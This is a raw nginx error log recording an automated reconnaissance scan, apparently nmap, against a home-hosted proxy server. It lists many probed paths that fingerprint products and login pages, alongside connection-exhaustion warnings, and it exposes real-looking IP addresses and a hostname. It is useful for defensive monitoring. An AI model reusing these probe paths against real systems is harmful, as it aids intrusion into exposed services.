/login/login.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259025 open() "/var/www/html/cgi-mod/header_logo.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cgi-mod/header_logo.cgi?size=big HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259026 open() "/var/www/html/allversions" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /allversions HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259030 open() "/var/www/html/index.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259034 open() "/var/www/html/dana-na/nc/nc_gina_ver.txt" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259038 open() "/var/www/html/r-seenet/index.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /r-seenet/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259039 open() "/var/www/html/versions" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /versions HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259040 open() "/var/www/html/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 389#389: *259624 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 388#388: *260537 open() "/var/www/html/login.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /login.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 388#388: *260535 open() "/var/www/html/menu.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 388#388: *260539 open() "/var/www/html/c/login" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /c/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [warn] 386#386: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:53 [warn] 387#387: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:53 [error] 389#389: *262429 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /WebApp/js/UI_String.js HTTP/1.1", upstream: "http://127.0.0.1:80/WebApp/js/UI_String.js", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [warn] 389#389: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:53 [error] 387#387: *262491 upstream prematurely closed connection while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /officescan/console/html/localization.js HTTP/1.1", upstream: "http://127.0.0.1:80/officescan/console/html/localization.js", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [alert] 387#387: 512 worker_connections are not enough +2026/01/18 03:02:53 [error] 388#388: *262579 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /images/logo.png HTTP/1.1", upstream: "http://127.0.0.1:80/images/logo.png", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 389#389: *262581 open() "/var/www/html/base.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 387#387: *262589 open() "/var/www/html/IPCamDesc.xml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /IPCamDesc.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 387#387: *262590 open() "/var/www/html/officescan/console/cgi/cgiChkMasterPwd.exe" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /officescan/console/cgi/cgiChkMasterPwd.exe HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 386#386: *262597 open() "/var/www/html/localstart.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 386#386: *263349 open() "/var/www/html/magento_version" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /magento_version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 386#386: *263832 open() "/var/www/html/api/v1.0/environment" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v1.0/environment HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 386#386: *263831 open() "/var/www/html/config" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /config HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:53 [error] 389#389: *264053 "/var/www/html/kylin/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /kylin/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:54 [error] 387#387: *264095 open() "/var/www/html/nmaplowercheck1768705364" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /nmaplowercheck1768705364 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:54 [error] 386#386: *264092 open() "/var/www/html/main.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:54 [error] 387#387: *264093 open() "/var/www/html/cslu/v1/core/conf" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cslu/v1/core/conf HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 387#387: *265587 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 387#387: *265589 open() "/var/www/html/admin.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 387#387: *265595 open() "/var/www/html/CHANGELOG.txt" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /CHANGELOG.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 388#388: *266197 open() "/var/www/html/admin/reports/status" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin/reports/status HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 389#389: *266800 open() "/var/www/html/inicio.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [warn] 387#387: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:55 [warn] 389#389: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:55 [warn] 386#386: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:55 [alert] 388#388: 512 worker_connections are not enough +2026/01/18 03:02:55 [error] 389#389: *267603 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /assets/png/favicon-abe32304.png HTTP/1.1", upstream: "http://127.0.0.1:80/assets/png/favicon-abe32304.png", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [alert] 387#387: 512 worker_connections are not enough +2026/01/18 03:02:55 [error] 387#387: *267606 upstream prematurely closed connection while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /javascript/validation/OEM.js HTTP/1.1", upstream: "http://127.0.0.1:80/javascript/validation/OEM.js", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 389#389: *267609 open() "/var/www/html/webportal.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /webportal.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 387#387: *267616 open() "/var/www/html/admin.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 386#386: *267617 open() "/var/www/html/administrator/manifests/files/joomla.xml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /administrator/manifests/files/joomla.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 386#386: *267621 open() "/var/www/html/workplace/home.action" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /workplace/home.action HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 386#386: *267625 open() "/var/www/html/home.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 386#386: *267627 "/var/www/html/pandora_console/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /pandora_console/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:55 [error] 386#386: *267628 open() "/var/www/html/pom.xml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /pom.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [warn] 386#386: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:56 [warn] 387#387: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:56 [warn] 389#389: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:56 [alert] 386#386: *269625 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /css/eonweb.css HTTP/1.1", upstream: "http://127.0.0.1:80/css/eonweb.css", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [alert] 388#388: 512 worker_connections are not enough +2026/01/18 03:02:56 [error] 387#387: *269634 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /App_Themes/Default/Images/favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/App_Themes/Default/Images/favicon.ico", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [error] 389#389: *269640 open() "/var/www/html/admin.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [error] 388#388: *269637 open() "/var/www/html/api/v3/meta" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v3/meta HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [error] 389#389: *269645 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [error] 388#388: *269651 open() "/var/www/html/localstart.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [error] 389#389: *269658 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [error] 388#388: *269655 open() "/var/www/html/am_bin/amlogin" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /am_bin/amlogin HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:56 [error] 388#388: *269657 open() "/var/www/html/centreon/api/latest/platform/versions" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /centreon/api/latest/platform/versions HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *269729 open() "/var/www/html/system/version/current" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /system/version/current HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *269728 open() "/var/www/html/i18n/component/JS" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /i18n/component/JS HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *270623 open() "/var/www/html/home.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *271152 open() "/var/www/html/api/v1/version" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v1/version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 387#387: *271154 open() "/var/www/html/hx/api/about" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /hx/api/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *271155 open() "/var/www/html/app/ui/login.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /app/ui/login.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 386#386: *271159 "/var/www/html/login/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /login/?next=/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *271160 open() "/var/www/html/Main_Login.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /Main_Login.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 386#386: *271162 open() "/var/www/html/home.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 386#386: *271161 open() "/var/www/html/cgi-bin/luci" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 386#386: *272570 open() "/var/www/html/photo/webapi/query.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 386#386: *272567 open() "/var/www/html/home.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *272835 open() "/var/www/html/metrics" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /metrics HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *272852 open() "/var/www/html/rs/application-about" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /rs/application-about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 389#389: *272843 open() "/var/www/html/json/login_session" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /json/login_session HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 386#386: *272841 open() "/var/www/html/nidp/app/login" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /nidp/app/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [alert] 386#386: *274417 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /assets/img/favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/assets/img/favicon.ico", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [warn] 386#386: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:57 [warn] 388#388: 512 worker_connections are not enough, reusing connections +2026/01/18 03:02:57 [alert] 388#388: 512 worker_connections are not enough +2026/01/18 03:02:57 [error] 386#386: *275053 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /MagicInfo/config.js HTTP/1.1", upstream: "http://127.0.0.1:80/MagicInfo/config.js", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:57 [error] 388#388: *275056 open() "/var/www/html/localstart.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /localstart.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 389#389: *275059 open() "/var/www/html/about" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 389#389: *275062 open() "/var/www/html/api/v1/info" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v1/info HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 389#389: *275061 open() "/var/www/html/ui/login.action" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /ui/login.action HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 387#387: *275065 open() "/var/www/html/main/main.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main/main.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 389#389: *275063 "/var/www/html/core/auth/login/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /core/auth/login/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 387#387: *275066 open() "/var/www/html/login" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 389#389: *275312 open() "/var/www/html/base.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 388#388: *276563 open() "/var/www/html/admin.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 388#388: *276562 open() "/var/www/html/api/status" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/status HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 387#387: *276566 open() "/var/www/html/agc/vicidial.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /agc/vicidial.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 389#389: *276570 open() "/var/www/html/api/v2/hoverfly/version" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v2/hoverfly/version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 388#388: *276561 open() "/var/www/html/agent/vicidial.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /agent/vicidial.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 389#389: *276565 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 387#387: *276571 open() "/var/www/html/~login" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /~login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 388#388: *276564 open() "/var/www/html/mailinspector/login.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /mailinspector/login.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:58 [error] 389#389: *276569 open() "/var/www/html/config_dump" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /config_dump HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 389#389: *276574 open() "/var/www/html/index.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 389#389: *276576 open() "/var/www/html/system/gwinfo" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /system/gwinfo HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 386#386: *276584 open() "/var/www/html/jtcgi/wte.pyc" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /jtcgi/wte.pyc HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 389#389: *276581 open() "/var/www/html/index.do" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.do HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 386#386: *276579 open() "/var/www/html/decisioncenter-api/v1/about" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /decisioncenter-api/v1/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 388#388: *276582 open() "/var/www/html/AppsHome.do" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /AppsHome.do HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 389#389: *276586 open() "/var/www/html/openapi.json" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /openapi.json HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 387#387: *276583 open() "/var/www/html/nifi-api/flow/about" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /nifi-api/flow/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 389#389: *277593 open() "/var/www/html/base.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 389#389: *278083 "/var/www/html/nifi/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /nifi/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 389#389: *278086 open() "/var/www/html/tos/index.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /tos/index.php?user/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 388#388: *278084 open() "/var/www/html/login.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /login.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 388#388: *278081 open() "/var/www/html/nmaplowercheck1768705365" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /nmaplowercheck1768705365 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:59 [error] 388#388: *278087 open() "/var/www/html/indice.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 388#388: *278088 open() "/var/www/html/v2" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /v2 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 388#388: *278095 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 386#386: *278246 open() "/var/www/html/cgi-bin/meteobridge.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/meteobridge.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 387#387: *278245 open() "/var/www/html/home.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /home.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 388#388: *278244 open() "/var/www/html/sys/en/neoclassic/login/login" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /sys/en/neoclassic/login/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 387#387: *278250 open() "/var/www/html/index.lua" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.lua HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 389#389: *279029 open() "/var/www/html/sap/bc/ui2/flp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /sap/bc/ui2/flp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 389#389: *279041 open() "/var/www/html/info.htm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /info.htm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 386#386: *279586 open() "/var/www/html/base.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /base.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 388#388: *279600 open() "/var/www/html/ignite" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /ignite?cmd=version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 388#388: *279602 open() "/var/www/html/api-description" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api-description HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 386#386: *279607 open() "/var/www/html/wp-content/plugins/post-smtp/readme.txt" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/post-smtp/readme.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:03:00 [error] 